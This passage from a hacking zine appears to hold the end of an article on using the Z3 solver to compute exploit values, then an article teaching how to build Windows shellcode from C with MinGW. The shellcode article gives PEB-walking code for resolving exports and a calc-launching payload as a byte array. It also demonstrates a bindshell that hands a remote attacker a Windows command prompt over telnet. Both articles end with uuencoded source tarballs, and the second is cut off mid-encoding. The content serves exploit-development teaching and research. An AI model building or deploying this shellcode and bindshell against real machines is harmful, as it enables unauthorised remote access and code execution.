know that a buffer size of 112 is possible, we simply add a constraint
making sure that allocsize is less than that. 

     s.add(ULT(allocsize & 0xffffffff,112))

Solving again, we can see that an allocsize of 98 is possible. Since this
is code we can easily wrap this in a loop to enumerate all possibilities.

    [+] Solving...
    [MODEL---------------------------------------]
    [allocsize = 98,
     height = 732446463,
     width = 4167741711,
     headersize = 113]
    [--------------------------------------------]

--[ Conclusion

Hopefully this small guide is useful to you. I find myself using these
small solvers constantly during exploit dev. Some other areas that these
help with are, during auditing - to confirm findings, during exploitation -
to calculate values on the fly. I'm sure once you start playing with this
library you will do the same. 

--[ References

1. https://z3.codeplex.com/ - Z3 Home Page
2. https://github.com/Z3Prover/z3 - Z3 github page

--[ Appendix: Source code

begin 644 z3_math_src.tgz
M'XL(`&"K858``^U7^T_;2!#FUUC*_S"`>K&)$_R(@T0(4DBX'A*T$H7K232J
M''N=6/@1V1M*./5_O]E=.W$H%)#22*?Z$\2>\;?SV-?L/IA?0YM.OJ:)L[_U
MBZ!IVH%E`7^VQ5,S6N*9`72C;6JF85G&`6BZV=*T+;!^54!%S%)J)QA*1,+X
M9SRD>=Y/OF=Y+)[_$SP4QM].'=\?)[[;=-;J`_NCW6H]._Y&VS`+X]_"\;<L
MS=@";:U1/(/??/QW_<@)9BZ!HY2Z?MR<'$LKJL`?/=8E?C1F.FG7)9X?$?CK
MM#<XO82=QNMQ`[U/_;,S&)SUWE_V+F#XAK8+?(EVEC$,+L]//P!&%Y!(%A$I
MDN1,[`3VG'@ZMR-W-G5M2F2A<U.JBC><^BK,HM0?1\0%/Z*0^@]$D?Z5*B$)
MG>E<9ES&XOJ.5$$9ZEU.0RDA=)9$@,J.]%V2F('0]B.9O=C)&(T+/_A^=S/D
M=E>\??-=.E$GQ!]/J.JCP2PLS$7=\_"W(TD5WY.9+=CN@JD`FJA,<1RH)^_,
M4GM,#N%="D?<TC$<"5O'V#\J=ZH-6=05<N]3N:&S=XRSPMD`7=9I-)X%,N?J
M0_7#]?FYJC&:,/288A0H:"</Y*8^A.L4)X?("$.:L0BXP(S]R!/F<Z*0E"Q;
M$=T16*O9DB2)DT/XS+_2.(8TM(,`FR\S7"2(5C(S>YDKJ&<318%CT.Y-3^!)
M%U?V*"#<18!9$Y#?S118)+0P^83?8J*]((@=F[)L1S//(PF?-6Z>,SP7'YIB
M$P"[WA,/EF;L/)M/AZ>[S<A/9O-Q1B'VX`)WN62^_71_%>/^G/A4#)'M8M`T
MSL/';H#1G))48?$OO6=AKBXUIE3%8BQ2XT3VD:M!!WP<XBP7%.IU4*0*"U^L
M@?!1XCQHEF<HDGQ=EI510NQ;]O8=_W%-IX3*H5K[I[:<G)7PAK\WS"'ZK'U)
M:D6E(931BE(7RGM-X^KG.R!4LP;<D9<0(H>/^IR-M=*I2&P#V>C^7ZS_GNV0
M41S?-J?SM?IXH?YK[0-#U'^M9;0/+%[_3:VL_YO`[O;^+$WV1WZT3Z([F,[I
M)(ZJ4E7RDCB$!Q/\<!HG%/:8KBKU<(:?152N]6I*53K)I1,F]7.ISZ1!+@V8
M5)52E#_%P1U)9"$W;=>5>[B#H94N&"U-`=B%7OT$6$U".>?TD3-@'$L3G'Y]
MP#DHYYQ!XZ3>9YR697%.IF#RPI=@&#IC"%]]X4NW6$1\*0+?_5B@[)33;.ZP
MULZ$.+<L;$IY,6R&L4L"ILC;7'P<G)Z_\M@RW,G;H;FEB;><?)B)]8Q_<?U?
MV+=XF`K(>BPO\=+ZUZSL_J?C!J"9;/WC7[G^-P$LKH=29>PXT`A-`PI70&C$
M2W&S1:G$QE!<_RG?GM==_5]<_[JNMQ?KWS1X_3>L\OZ_$;RI_HO+1Q=.?/HW
M<>0:EVLJF`:6PL5=,?\J%,O/["+!+C\KE%Q94SFK*O'3_B/:0K=@/7V:*/KH
M@JZ;2O[E^OV5N$&HVKV7S3M%P3/`GW&2W3#`L_T@YQ>BZ/YX1UOZ63HXORHT
M^@,OE]G=TE,+;![K+KS81-<-P?TMSR0E2I0H4:)$B1(E2I0H4:)$B1(EUH?_
)`+AIM`(`*```
`
end


|=[ 0x06 ]=---=[ Shellcode the better way, or
                 how to just use your compiler - fishstiqz ]=------------=|


|=-----------------------------------------------------------------------=|
|=----=[ Shellcode the better way, or how to just use your compiler ]----=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ by fishstiqz ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Introduction

Back in the prehistoric days of memory corruption bugs and exploitation,   
exploit developers used our primitive tools to construct rudimentary
payloads in assembly language. Those days are long past. In this small
paper I will investigate some methods for anyone still stuck in the good
ol' days of yore using their assembler.

--[ Prerequisites

This writeup uses the MinGW compiler to demonstrate generating shellcode
from C for running on Windows systems. The same concepts should apply to
other compilers (such as MSVC) with some tweaking. The python scripts also
use the 'pefile' library from erocarrera in order to extract the compiled
code.

To quickly get started compiling on a linux system, do something like:

    $ sudo apt-get install gcc-mingw-w64
    $ pip install pefile

--[ Concepts

There is nothing special about shellcode as opposed to any other compiled
code. A shellcode is simply some piece of machine code that typically
exhibits the following properties:

* Position-independence
* Entry point at first byte
* Bootstrap for subsequent execution / further access

Position-independence is basically the only real hurdle faced when
building shellcode with a C compiler. Strings and imported functions will
need to be handled inline. All code will need to placed in one section
and will need to be ordered appropriately in order to ensure everything is
appropriately extracted and relative jumps are correct.

This paper will not deal with creating shellcodes that are intended to
bypass filters. In the extremely rare event that a filter is necessary
(when is the last time you actually needed one in your browser exploit?)
it is best to write an encoder and decoder.

--[ Inlining strings

Inlining strings is quite easily accomplished with inline assembly as in
the following macro:

    #define INLINE_STR(name, str) \
        const char * name;          \
        asm(                        \
            "call 1f\n"             \
            ".asciz \"" str "\"\n"  \
            "1:\n"                  \
            "pop %0\n"              \
            : "=r" (name)           \
        );

This is how it would be used:

    INLINE_STR(kernel32, "kernel32");
    PVOID pKernel32 = scGetModuleBase(kernel32);

Unfortunately MinGW doesn't have a way to inline a unicode string nor does
MSVC have inline assembly for x64 so a different method must be employed
when these are being used.

One potential way to handle unicode strings would be to generate an inline
sequence of .db bytes as a pre-compile step. For MSVC, writing strings one
character at a time to a stack buffer also works but is quite ugly.

--[ Ordering functions

The Makefile included with the source code makes use of the
-fno-toplevel-reorder switch which causes code to be generated in the same
order they appear in the source files. The Makefile also uses
-falign-functions=1 to reduce padding between functions and generate
smaller code.

Each function is also marked with an attribute forcing them to be
placed into a custom section.

    #define SCFUNC __attribute__((section("sccode")))

This custom section makes extraction of the final code very simple
as all shellcode functions will be placed into the "sccode" section
and ordered appropriately.

In MSVC an order file can be specified with /ORDER to achieve the
same effect.

--[ Example shellcode

The following is a quick GetProcAddress implementation in C which
will be used for the examples here.

    SCFUNC PVOID scGetModuleBase(const char *moduleName)
    {
        PPEB pPeb;
        PLIST_ENTRY head, entry;
        PLDR_DATA_TABLE_ENTRY module;

    #if defined(_M_IX86)
        pPeb = (PPEB) __readfsdword(0x30);
    #elif defined(_M_X64)
        pPeb = (PPEB) __readgsqword(0x60);
    #endif

        head = &pPeb->Ldr->InLoadOrderModuleList;
        entry = head->Flink;

        while (entry != head)
        {
            module = CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY,
            InLoadOrderModuleList);
            if (scW2Anicmp(module->BaseDllName.Buffer, moduleName, scStrlen
            (moduleName)) == 0)
                return module->DllBase;
            entry = entry->Flink;
        }

        return NULL;
    }

    SCFUNC PVOID scGetProcAddr(PVOID modBase, const char *exportName)
    {
        LPVOID pFunc = NULL;
        PBYTE pMod = (PBYTE)modBase;
        PIMAGE_NT_HEADERS pNt = GET_NT_HEADERS(pMod);
        PIMAGE_DATA_DIRECTORY pDir = &GET_DIRECTORY(pNt,
        IMAGE_DIRECTORY_ENTRY_EXPORT);
        PIMAGE_EXPORT_DIRECTORY pExportDir;
        WORD *pOrdinal;
        DWORD *pName;
        DWORD *pFuncs;
        DWORD i;

        // get the export directory
        pExportDir = (PIMAGE_EXPORT_DIRECTORY)(pMod + pDir->
        VirtualAddress);

        // sanity check the export directory
        if (pDir->Size == 0 || pExportDir->NumberOfFunctions == 0 ||
        pExportDir->NumberOfNames == 0)
            return NULL;

        // iterate the exported names
        pName = (DWORD *) (pMod + pExportDir->AddressOfNames);
        pOrdinal = (WORD *) (pMod + pExportDir->AddressOfNameOrdinals);

        // hi EMET!
        pFuncs = (DWORD *) (pMod + pExportDir->AddressOfFunctions);

        for (i = 0; i < pExportDir->NumberOfNames; i++, pName++,
        pOrdinal++)
        {
            if (scStrcmp(exportName, (const char *)(pMod + *pName)) == 0)
            {
                // found the name, get the function
                pFunc =  pMod + pFuncs[*pOrdinal];
                break;
            }
        }

        return pFunc;
    }

Here you can see a quick calc-pop demonstration using the above code:

    #include <stdio.h>
    #include <windows.h>

    #include "common.h"
    #include "pe.h"

    typedef UINT (WINAPI * WinExec_t)(LPCSTR lpCmdLine, UINT uCmdShow);

    SCFUNC void scMain(void)
    {
        INLINE_STR(kernel32, "kernel32");
        INLINE_STR(winexec, "WinExec");
        INLINE_STR(calc, "calc");

        PVOID pKernel32 = scGetModuleBase(kernel32);
        WinExec_t pWinExec = (WinExec_t) scGetProcAddr(pKernel32, winexec);
        if (pWinExec != NULL)
            pWinExec(calc, 0);
    }


    int main(int argc, char* argv[])
    {
        scMain();
        return 0;
    }

Thats all there is to the code. Notice that all shellcode functions
are marked with the SCFUNC attribute and all strings are inlined.

Now to compile and extract the shellcode into a nice header:

    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o runcalc.exe runcalc.c common.c pe.c
    $ python extract.py runcalc.exe
    // 460 bytes
    unsigned char shellcode[460] = {
    0x55,0x89,0xE5,0x56,0x53,0x83,0xEC,0x10,0xE8,0x09,0x00,0x00,
    0x00,0x6B,0x65,0x72,0x6E,0x65,0x6C,0x33,0x32,0x00,0x58,0x89,
    0x04,0x24,0xE8,0xD1,0x00,0x00,0x00,0xE8,0x08,0x00,0x00,0x00,
    0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0x5E,0x89,0x74,0x24,
    0x04,0xE8,0x05,0x00,0x00,0x00,0x63,0x61,0x6C,0x63,0x00,0x5B,
    0x89,0x04,0x24,0xE8,0xFD,0x00,0x00,0x00,0x85,0xC0,0x74,0x0F,
    0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x1C,0x24,0xFF,
    0xD0,0x50,0x50,0x8D,0x65,0xF8,0x5B,0x5E,0x5D,0xC3,0x90,0x90,
    0x55,0x31,0xC0,0x89,0xE5,0x57,0x56,0x53,0x51,0x83,0x7D,0x10,
    0x00,0x74,0x44,0x31,0xD2,0x8B,0x45,0x08,0x66,0x8B,0x0C,0x50,
    0x8B,0x45,0x0C,0x8D,0x79,0xBF,0x0F,0xBE,0x1C,0x10,0x0F,0xB7,
    0xC1,0x66,0x83,0xFF,0x19,0x8D,0x70,0x20,0x0F,0x46,0xC6,0x89,
    0x45,0xF0,0x8D,0x73,0xBF,0x89,0xF0,0x3C,0x19,0x8B,0x45,0xF0,
    0x8D,0x7B,0x20,0x0F,0x46,0xDF,0x29,0xD8,0x75,0x0D,0x66,0x85,
    0xC9,0x74,0x08,0x42,0x39,0x55,0x10,0x75,0xC0,0x31,0xC0,0x5A,
    0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x31,0xD2,0x89,0xE5,0x53,0x8B,
    0x45,0x08,0x8B,0x5D,0x0C,0x8A,0x0C,0x10,0x0F,0xBE,0x1C,0x13,
    0x42,0x0F,0xBE,0xC1,0x29,0xD8,0x75,0x04,0x84,0xC9,0x75,0xE7,
    0x5B,0x5D,0xC3,0x55,0x89,0xE5,0x8B,0x55,0x08,0x89,0xD0,0x80,
    0x38,0x00,0x74,0x03,0x40,0xEB,0xF8,0x29,0xD0,0x5D,0xC3,0x90,
    0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x75,0x08,
    0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x58,0x0C,
    0x8D,0x78,0x0C,0x39,0xFB,0x74,0x28,0x89,0x34,0x24,0xE8,0xC4,
    0xFF,0xFF,0xFF,0x8B,0x53,0x30,0x89,0x74,0x24,0x04,0x89,0x14,
    0x24,0x89,0x44,0x24,0x08,0xE8,0x36,0xFF,0xFF,0xFF,0x85,0xC0,
    0x75,0x05,0x8B,0x43,0x18,0xEB,0x06,0x8B,0x1B,0xEB,0xD4,0x31,
    0xC0,0x83,0xC4,0x1C,0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x89,0xE5,
    0x57,0x56,0x53,0x83,0xEC,0x2C,0x8B,0x5D,0x08,0x8B,0x43,0x3C,
    0x01,0xD8,0x8B,0x70,0x78,0x01,0xDE,0x83,0x78,0x7C,0x00,0x75,
    0x04,0x31,0xC0,0xEB,0x63,0x83,0x7E,0x14,0x00,0x74,0xF6,0x83,
    0x7E,0x18,0x00,0x74,0xF0,0x8B,0x46,0x20,0x31,0xD2,0x8B,0x4E,
    0x1C,0x01,0xD8,0x89,0x45,0xE4,0x8B,0x46,0x24,0x01,0xD8,0x89,
    0x45,0xE0,0x8D,0x3C,0x12,0x03,0x7D,0xE0,0x3B,0x56,0x18,0x73,
    0xD0,0x89,0x4D,0xD8,0x8B,0x4D,0xE4,0x89,0x55,0xDC,0x8B,0x04,
    0x91,0x01,0xD8,0x89,0x44,0x24,0x04,0x8B,0x45,0x0C,0x89,0x04,
    0x24,0xE8,0x0F,0xFF,0xFF,0xFF,0x8B,0x55,0xDC,0x8B,0x4D,0xD8,
    0x85,0xC0,0x75,0x0D,0x0F,0xB7,0x07,0x8D,0x04,0x83,0x03,0x1C,
    0x08,0x89,0xD8,0xEB,0x03,0x42,0xEB,0xBE,0x83,0xC4,0x2C,0x5B,
    0x5E,0x5F,0x5D,0xC3
    };

And now to demonstrate running the test harness:

    $ python extract.py --testharness runcalc.exe > runcalc_testharness.c
    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
          -Os -o runcalc_testharness.exe runcalc_testharness.c

On the windows machine:

    C:\phrack\src>runcalc_testharness.exe
    jumping to shellcode @ 00020000
    done
    C:\phrack\src>tasklist | findstr calc
    calc.exe                      5720 Console                    1     
    14,244 K

--[ Bindshell example

The following is a demonstration of a quick windows bindshell. Consult the
source code for the implementation.

On the linux compiler:

    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o bindshell.exe bindshell.c common.c pe.c
    $ python extract.py --testharness bindshell.exe > \
             bindshell_testharness.c
    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o bindshell_testharness.exe bindshell_testharness.c

On the windows machine:

    C:\phrack\src>bindshell_testharness.exe
    jumping to shellcode @ 00020000

Attacker:

    $ telnet 192.168.204.144 3333
    Trying 192.168.204.144...
    Connected to 192.168.204.144.
    Escape character is '^]'.
    Microsoft Windows [Version 10.0.10240]
    (c) 2015 Microsoft Corporation. All rights reserved.

    C:\phrack\src>ver
    ver

    Microsoft Windows [Version 10.0.10240]

    C:\phrack\src>whoami
    whoami
    win10-vm\user

    C:\phrack\src>exit
    exit
    Connection closed by foreign host.


--[ Conclusion

Hopefully this humble paper showed that its super easy to generate
shellcode with a C compiler and that you don't have to use an assembler.
Obviously assembly language development and understanding are still
essential skills for a modern exploit developer. However, using the
techniques presented in this paper should limit the times when
hand-written assembly code is required to a few specific cases.

--[ References

1. http://www.mingw.org/
2. https://github.com/erocarrera/pefile
3. https://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html
4. https://msdn.microsoft.com/en-us/library/00kh39zz.aspx

--[ Appendix: Source code

begin 644 src.tar.gz
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
